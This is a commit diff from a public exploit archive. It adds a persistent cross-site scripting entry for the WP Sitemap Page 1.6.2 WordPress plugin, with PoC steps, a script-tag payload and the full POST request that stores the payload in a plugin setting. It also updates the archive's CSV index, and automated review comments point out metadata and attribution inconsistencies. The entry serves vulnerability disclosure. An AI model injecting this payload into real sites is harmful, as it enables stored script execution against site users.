DB: 2020-02-19
1 changes to exploits/shellcodes
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
parent 228a37da9c
commit e28fa0b839
2 changed files with 33 additions and 1 deletions
31
exploits/php/webapps/48093.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
|
||||
# Dork:N/A
|
||||
# Date: 2020-02-17
|
||||
# Exploit Author: UltraSecurityTeam
|
||||
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
|
||||
# Vendor Homepage: UltraSec.Org
|
||||
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
|
||||
# Tested on: Windows/Linux
|
||||
# Version: 1.6.2
|
||||
|
||||
|
||||
|
||||
.:: Plugin Description ::.
|
||||
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
|
||||
|
||||
|
||||
.:: Proof Of Concept (PoC) ::.
|
||||
|
||||
Step 1 - Open WordPress Setting
|
||||
Step 2 - Open Wp Sitemap Page
|
||||
Step 3 - Inject Your Java Script Codes to Exclude pages
|
||||
Step 4 - Click Button Save Changes
|
||||
Step 5 - Run Your Payload
|
||||
|
||||
|
||||
.:: Tested Payload ::.
|
||||
'>"><script>alert(/XSS By UltraSecurity/)</script>
|
||||
|
||||
|
||||
.:: Post Request ::.
|
||||
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes
|
|
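Review bot: The `# Vendor Homepage: UltraSec.Org` header line in 48093.txt names the reporting team's site (the author line is UltraSecurityTeam), not the vendor of WP Sitemap Page; it should point at the plugin's own page, as the Software Link line already does with downloads.wordpress.org. The PoC section also leaves out what a defender needs to rate the issue: the recorded request is a settings update that carries a `_wpnonce` from the options page, so the entry should state which role is required to save `wsp_exclude_pages`, and "Step 5 - Run Your Payload" should name the page on which the stored value is rendered.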
@ -42369,7 +42369,8 @@ id,file,description,date,author,type,platform,port
|
|||
48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
|
||||
48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
|
||||
48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ashkan Moghaddas",webapps,php,
|
||||
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php,
|
||||
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
|
||||
48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php,
|
||||
|
|
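Review bot: The two 48083 rows differ only in the author field ("Ashkan Moghaddas" versus "Ultra Security Team"), and with the hunk header counting 7 lines before and 8 after, one of them is the removed row and the other its replacement, so this commit changes the attribution of an existing entry. Neither the commit message nor the changed-file list (48093.txt and this CSV index) accounts for that: 48083.txt is not touched, so the index and that file's own author header can now disagree. Either update 48083.txt in the same commit or record the reason for the re-attribution. The new 48093 row also gives 2020-02-18 where 48093.txt says `# Date: 2020-02-17`; if the CSV column holds the publication date rather than the author's date, the column documentation should say so.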